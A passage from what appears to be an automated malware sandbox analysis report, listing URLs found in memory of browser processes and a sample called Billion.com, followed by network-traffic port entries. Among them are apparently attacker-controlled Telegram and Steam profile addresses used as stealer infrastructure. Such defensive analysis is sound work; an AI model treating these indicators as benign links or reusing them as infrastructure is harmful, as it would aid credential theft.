                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000015.00000003.2865987835.000026600026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974268617.000074F402484000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2974396044.000074F402488000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 00000012.00000002.2811895050.00002780009E3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812014272.0000278000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
                Source: chrome.exe, 00000012.00000003.2739165122.000027800113C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739266755.000027800120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: chrome.exe, 00000012.00000002.2812014272.0000278000A24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://policies.google.com/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 00000012.00000002.2808511544.000027800009C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
                Source: chrome.exe, 00000012.00000002.2808543530.00002780000B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000012.00000002.2811350010.000027800080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811255241.00002780007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Billion.com, 0000000C.00000002.3329936932.0000000004391000.00000040.00001000.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541281715.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540896451.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3327789976.0000000004110000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541052285.0000000004391000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3327625585.0000000004090000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Billion.com, 0000000C.00000003.2540745906.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541000728.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540769406.0000000004128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Billion.com, 0000000C.00000002.3326082408.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Billion.com, 0000000C.00000002.3326082408.0000000000E5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/DW
                Source: Billion.com, 0000000C.00000003.2540745906.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2541000728.00000000040A8000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540939282.0000000000F1F000.00000004.00000020.00020000.00000000.sdmp, Billion.com, 0000000C.00000003.2540769406.0000000004128000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Billion.com, 0000000C.00000002.3327789976.000000000413C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm
                Source: Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Billion.com, 0000000C.00000002.3327789976.000000000413C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aels
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelt
                Source: chrome.exe, 00000012.00000002.2812065716.0000278000A50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://t0.gstatic.com/faviconV2
                Source: chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tasks.googleapis.com/
                Source: Billion.com, 0000000C.00000002.3329936932.00000000043DD000.00000040.00001000.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3326463584.0000000000EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000006194000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.12.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                Source: Billion.com, 0000000C.00000002.3328091669.000000000437A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmp, 16PP89.12.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                Source: chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812647167.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2759214939.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776245551.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2785855672.0000278000C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                Source: chrome.exe, 00000012.00000003.2756652980.00002780002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 00000012.00000003.2722102002.00002780004C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810403378.00002780005E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: chrome.exe, 00000012.00000002.2811380536.000027800081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2812544045.0000278000BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/Char
                Source: chrome.exe, 00000012.00000002.2812984073.0000278000C97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
                Source: chrome.exe, 00000012.00000002.2816620216.0000278000FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/async/newtab_promos
                Source: content.js.27.dr, content_new.js.27.drString found in binary or memory: https://www.google.com/chrome
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                Source: chrome.exe, 00000012.00000002.2811380536.000027800081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2813807994.0000278000D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811819315.0000278000984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/
                Source: chrome.exe, 00000012.00000002.2811380536.000027800081C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2808984785.00002780001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2813807994.0000278000D5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2811819315.0000278000984000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/tips/gs
                Source: chrome.exe, 00000012.00000002.2810110703.000027800050C000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, 16PP89.12.dr, 58YU37.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: chrome.exe, 00000012.00000002.2811153144.0000278000780000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icoenterInsights
                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                Source: chrome.exe, 00000012.00000002.2809863625.0000278000478000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                Source: chrome.exe, 00000012.00000003.2739029225.0000278000310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                Source: chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
                Source: chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/tools/feedback/chrome/__submitage.Incoming.ThirdPartyToThirdParty.SameBucketX
                Source: chrome.exe, 00000012.00000002.2812095120.0000278000A64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/undo
                Source: chrome.exe, 00000012.00000003.2756652980.00002780002A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
                Source: chrome.exe, 00000012.00000002.2808273997.0000278000014000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                Source: chrome.exe, 00000012.00000003.2770867030.00002780016D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2770893240.00002780016DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                Source: chrome.exe, 00000012.00000003.2767384010.000027800140C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/oauth2/v4/token
                Source: chrome.exe, 00000012.00000002.2809048837.000027800020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2739003701.0000278000C2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2735408123.0000278000C30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
                Source: chrome.exe, 00000012.00000002.2810228742.0000278000561000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                Source: chrome.exe, 00000012.00000002.2810055623.00002780004DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
                Source: chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000012.00000003.2775586059.0000278001C58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2775032657.0000278001CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2775950748.0000278001C28000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2775735731.0000278001C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2820062825.0000278001C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                Source: chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
                Source: chrome.exe, 00000012.00000003.2775654512.0000278001C44000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2788157585.0000278000DB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2774896977.0000278001CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2776169900.0000278001CE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                Source: Billion.com, 0000000C.00000002.3333594942.0000000006303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: PodcastsTries.exeString found in binary or memory: https://www.ssl.com/repository0
                Source: Billion.com, 0000000C.00000002.3328091669.00000000042DD000.00000004.00000800.00020000.00000000.sdmp, Billion.com, 0000000C.00000002.3331378130.0000000006194000.00000004.00000800.00020000.00000000.sdmp, HDJEU3.12.drString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000012.00000002.2809276901.00002780002D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810820713.00002780006FD000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000003.2722834070.000027800056C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.2810140682.000027800053B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
                Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
                Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
